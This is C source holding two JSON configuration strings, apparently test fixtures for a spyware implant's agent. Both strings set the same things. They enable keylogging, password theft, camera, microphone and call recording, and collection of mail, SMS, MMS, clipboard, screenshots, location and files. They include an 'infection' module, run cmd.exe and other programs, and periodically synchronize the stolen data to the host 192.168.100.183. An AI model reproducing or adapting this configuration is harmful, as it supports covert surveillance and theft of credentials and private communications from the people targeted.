char* test_2_json = "{\
    \"events\": [\
        {\
            \"ts\": \"00:00:00\",\
            \"start\": 0,\
            \"te\": \"23:59:59\",\
            \"desc\": \"STARTUP\",\
            \"subtype\": \"loop\",\
            \"enabled\": true,\
            \"event\": \"timer\"\
        },\
        {\
            \"ts\": \"00:00:00\",\
            \"repeat\": 1,\
            \"te\": \"23:59:59\",\
            \"event\": \"timer\",\
            \"delay\": 60,\
            \"desc\": \"SYNC\",\
            \"enabled\": true,\
            \"subtype\": \"loop\"\
        },\
        {\
            \"window\": false,\
            \"repeat\": 4,\
            \"start\": 2,\
            \"process\": \"notepad.exe\",\
            \"desc\": \"Calc\",\
            \"focus\": false,\
            \"delay\": 60,\
            \"end\": 3,\
            \"enabled\": true,\
            \"event\": \"process\"\
        }\
    ],\
    \"modules\": [\
        {\"module\": \"addressbook\"},\
        {\"module\": \"application\"},\
        {\"module\": \"backup\", \"_type\": \"desktop\", \"_platform\": \"osx\"},\
        {\"module\": \"calendar\"},\
        {\"module\": \"call\", \"compression\": 5, \"record\": true, \"buffer\": 512000},\
        {\"module\": \"camera\", \"quality\": \"med\"},\
        {\"module\": \"chat\"},\
        {\"module\": \"clipboard\"},\
        {\
            \"camera\": true,\
            \"call\": true,\
            \"position\": true,\
            \"network\": {\"enabled\": false, \"processes\": []},\
            \"module\": \"crisis\",\
            \"mic\": true,\
            \"hook\": {\"enabled\": true, \"processes\": []},\
            \"synchronize\": false\
        },\
        {\"module\": \"device\", \"list\": false},\
        {\
            \"capture\": true,\
            \"accept\": [],\
            \"deny\": [\
                \"*.dll\",\
                \"*.exe\",\
                \"*.ini\",\
                \"*.lnk\",\
                \"*.ico\",\
                \"*.tlb\",\
                \"*.clb\",\
                \"*.dat\",\
                \"*.drv\",\
                \"*.ocx\",\
                \"*.url\"\
            ],\
            \"minsize\": 1,\
            \"module\": \"file\",\
            \"maxsize\": 500000,\
            \"date\": \"2015-02-13 00:00:00\",\
            \"open\": false\
        },\
        {\"module\": \"infection\", \"local\": false, \"mobile\": false, \"factory\": \"\", \"vm\": 0, \"usb\": false},\
        {\"module\": \"keylog\"},\
        {\"module\": \"money\"},\
        {\
            \"module\": \"messages\",\
            \"mail\": {\
                \"enabled\": true,\
                \"filter\": {\
                    \"dateto\": \"2100-01-01 00:00:00\",\
                    \"maxsize\": 100000,\
                    \"datefrom\": \"2015-02-13 00:00:00\",\
                    \"history\": true\
                }\
            },\
            \"mms\": {\
                \"enabled\": true,\
                \"filter\": {\"history\": true, \"datefrom\": \"2015-02-13 00:00:00\", \"dateto\": \"2100-01-01 00:00:00\"}\
            },\
            \"sms\": {\
                \"enabled\": true,\
                \"filter\": {\"history\": true, \"datefrom\": \"2015-02-13 00:00:00\", \"dateto\": \"2100-01-01 00:00:00\"}\
            }\
        },\
        {\"module\": \"mic\", \"threshold\": 0.22, \"autosense\": false, \"silence\": 5},\
        {\"module\": \"mouse\", \"width\": 50, \"height\": 50},\
        {\"module\": \"password\"},\
        {\"module\": \"photo\"},\
        {\"gps\": false, \"module\": \"position\", \"cell\": true, \"wifi\": true},\
        {\"module\": \"screenshot\", \"quality\": \"med\", \"onlywindow\": false},\
        {\"module\": \"url\"}\
    ],\
    \"globals\": {\
        \"migrated\": false,\
        \"wipe\": false,\
        \"advanced\": true,\
        \"type\": \"desktop\",\
        \"version\": 2012041601,\
        \"collapsed\": false,\
        \"nohide\": [],\
        \"quota\": {\"max\": 4194304000, \"min\": 1048576000},\
        \"remove_driver\": true\
    },\
    \"actions\": [\
        {\
            \"desc\": \"STARTUP\",\
            \"subactions\": [\
                {\"action\": \"module\", \"status\": \"start\", \"module\": \"device\"},\
                {\"action\": \"module\", \"status\": \"start\", \"module\": \"photo\"},\
                {\"action\": \"module\", \"status\": \"start\", \"module\": \"file\"}\
            ]\
        },\
        {\
            \"desc\": \"SYNC\",\
            \"subactions\": [\
                {\
                    \"stop\": false,\
                    \"bandwidth\": 500000,\
                    \"action\": \"synchronize\",\
                    \"cell\": false,\
                    \"mindelay\": 0,\
                    \"wifi\": true,\
                    \"host\": \"192.168.100.183\",\
                    \"maxdelay\": 0\
                }\
            ]\
        },\
        {\
            \"desc\": \"notepad\",\
            \"subactions\": [\
                {\"action\": \"execute\", \"command\": \"calc.exe\"},\
                {\"module\": \"clipboard\", \"status\": \"start\", \"action\": \"module\"}\
            ]\
        },\
        {\"desc\": \"cmd\", \"subactions\": [{\"action\": \"execute\", \"command\": \"cmd.exe\"}]},\
        {\
            \"desc\": \"\",\
            \"subactions\": [\
                {\
                    \"stop\": false,\
                    \"bandwidth\": 500000,\
                    \"action\": \"synchronize\",\
                    \"cell\": false,\
                    \"mindelay\": 0,\
                    \"wifi\": true,\
                    \"host\": \"192.168.100.183\",\
                    \"maxdelay\": 0\
                }\
            ]\
        }\
    ]\
}";


char* conf = "{ \
\"events\": [ \
{\
	\"start\": 0,\
		\"te\" : \"23:59:59\",\
		\"subtype\" : \"loop\",\
		\"ts\" : \"00:00:00\",\
		\"enabled\" : true,\
		\"event\" : \"timer\",\
		\"desc\" : \"STARTUP\"\
},\
{\
	\"desc\": \"SYNC\",\
	\"repeat\" : 1,\
	\"ts\" : \"00:00:00\",\
	\"subtype\" : \"loop\",\
	\"delay\" : 60,\
	\"enabled\" : true,\
	\"event\" : \"timer\",\
	\"te\" : \"23:59:59\"\
},\
{\
	\"window\": false,\
	\"repeat\" : 4,\
	\"start\" : 2,\
	\"focus\" : false,\
	\"delay\" : 10,\
	\"end\" : 3,\
	\"process\" : \"calc.exe\",\
	\"enabled\" : true,\
	\"event\" : \"process\",\
	\"desc\" : \"Calc\"\
}\
],\
\"modules\": [\
	{\"module\": \"addressbook\"},\
	{ \"module\": \"application\" },\
	{ \"module\": \"backup\", \"_type\" : \"desktop\", \"_platform\" : \"osx\" },\
	{ \"module\": \"calendar\" },\
	{ \"buffer\": 512000, \"module\" : \"call\", \"compression\" : 5, \"record\" : true },\
	{ \"quality\": \"med\", \"module\" : \"camera\" },\
	{ \"module\": \"chat\" },\
	{ \"module\": \"clipboard\" },\
	{\
		\"network\": {\"enabled\": false, \"processes\" : []},\
		\"call\" : true,\
		\"hook\" : {\"enabled\": true, \"processes\" : []},\
		\"synchronize\" : false,\
		\"module\" : \"crisis\",\
		\"camera\" : true,\
		\"mic\" : true,\
		\"position\" : true\
	},\
	{ \"list\": false, \"module\" : \"device\" },\
	{\
		\"minsize\": 1,\
		\"module\" : \"file\",\
		\"maxsize\" : 500000,\
		\"capture\" : true,\
		\"accept\" : [],\
		\"date\" : \"2015-02-13 00:00:00\",\
		\"deny\" : [\
				\"*.dll\",\
				\"*.exe\",\
				\"*.ini\",\
				\"*.lnk\",\
				\"*.ico\",\
				\"*.tlb\",\
				\"*.clb\",\
				\"*.dat\",\
				\"*.drv\",\
				\"*.ocx\",\
				\"*.url\"\
		],\
		\"open\": false\
	},\
	{ \"local\": false, \"vm\" : 0, \"factory\" : \"\", \"module\" : \"infection\", \"usb\" : false, \"mobile\" : false },\
	{ \"module\": \"keylog\" },\
	{ \"module\": \"money\" },\
	{\
		\"sms\": {\
			\"enabled\": true,\
				\"filter\" : {\"history\": true, \"dateto\" : \"2100-01-01 00:00:00\", \"datefrom\" : \"2015-02-13 00:00:00\"}\
		},\
			\"module\" : \"messages\",\
			\"mail\" : {\
			\"enabled\": true,\
				\"filter\" : {\
				\"dateto\": \"2100-01-01 00:00:00\",\
					\"history\" : true,\
					\"maxsize\" : 100000,\
					\"datefrom\" : \"2015-02-13 00:00:00\"\
			}\
		},\
			\"mms\": {\
			\"enabled\": true,\
				\"filter\" : {\"history\": true, \"dateto\" : \"2100-01-01 00:00:00\", \"datefrom\" : \"2015-02-13 00:00:00\"}\
		}\
	},\
	{ \"threshold\": 0.22, \"module\" : \"mic\", \"autosense\" : false, \"silence\" : 5 },\
	{ \"module\": \"mouse\", \"width\" : 50, \"height\" : 50 },\
	{ \"module\": \"password\" },\
	{ \"module\": \"photo\" },\
	{ \"gps\": false, \"cell\" : true, \"module\" : \"position\", \"wifi\" : true },\
	{ \"module\": \"screenshot\", \"quality\" : \"med\", \"onlywindow\" : false },\
	{ \"module\": \"url\" }\
],\
\"globals\": {\
		\"version\": 2012041601,\
			\"collapsed\" : false,\
			\"type\" : \"desktop\",\
			\"nohide\" : [],\
			\"quota\" : {\"max\": 4194304000, \"min\" : 1048576000},\
			\"advanced\" : true,\
			\"wipe\" : false,\
			\"remove_driver\" : true,\
			\"migrated\" : false\
	},\
	\"actions\": [\
		{\
			\"subactions\": [\
			{\"action\": \"module\", \"status\" : \"start\", \"module\" : \"device\"},\
			{ \"action\": \"module\", \"status\" : \"start\", \"module\" : \"photo\" },\
			{ \"action\": \"module\", \"status\" : \"start\", \"module\" : \"file\" }\
			],\
			\"desc\" : \"STARTUP\"\
		},\
		{\
			\"subactions\": [\
			{\
				\"stop\": false,\
					\"cell\" : false,\
					\"mindelay\" : 0,\
					\"wifi\" : true,\
					\"action\" : \"synchronize\",\
					\"maxdelay\" : 0,\
					\"host\" : \"192.168.100.183\",\
					\"bandwidth\" : 500000\
			}\
			],\
				\"desc\": \"SYNC\"\
		},\
		{ \"subactions\": [{\"action\": \"execute\", \"command\" : \"notepad.exe\"}], \"desc\" : \"notepad\" },\
		{ \"subactions\": [{\"action\": \"execute\", \"command\" : \"cmd.exe\"}], \"desc\" : \"cmd\" },\
		{\
			\"subactions\": [\
			{\
				\"stop\": false,\
					\"cell\" : false,\
					\"mindelay\" : 0,\
					\"wifi\" : true,\
					\"action\" : \"synchronize\",\
					\"maxdelay\" : 0,\
					\"host\" : \"192.168.100.183\",\
					\"bandwidth\" : 500000\
			}\
			],\
				\"desc\": \"\"\
		}\
	]\
}";
